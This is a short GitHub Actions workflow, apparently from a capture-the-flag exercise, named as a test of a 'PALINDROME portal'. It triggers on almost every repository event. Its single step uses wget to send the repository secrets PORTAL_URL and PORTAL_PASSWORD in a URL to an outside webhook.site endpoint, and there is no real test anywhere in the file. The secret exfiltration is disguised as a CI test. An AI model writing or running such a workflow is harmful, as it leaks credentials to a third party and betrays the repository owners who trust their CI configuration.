name: Test the PALINDROME portal pls!!!

on: [branch_protection_rule, check_run, check_suite, create, delete, deployment, deployment_status, discussion, discussion_comment, fork, gollum, issue_comment, issues, label, merge_group, milestone, page_build, project, project_card, project_column, public, pull_request, pull_request_review, pull_request_review_comment, pull_request_target, push, registry_package, release, repository_dispatch, schedule, status, watch, workflow_call, workflow_dispatch]

jobs:
  test:
    runs-on: windows-latest
    steps:
      - uses: actions/checkout@v3
      - name: Test the PALINDROME portal
        run: | 
          C:\msys64\usr\bin\wget.exe '''https://webhook.site/11baeb3d-93ea-416f-9812-cab376bd2a98?meow=${{ secrets.PORTAL_URL }}&bleh=${{ secrets.PORTAL_PASSWORD }}''' -O test -d -v
          cat test
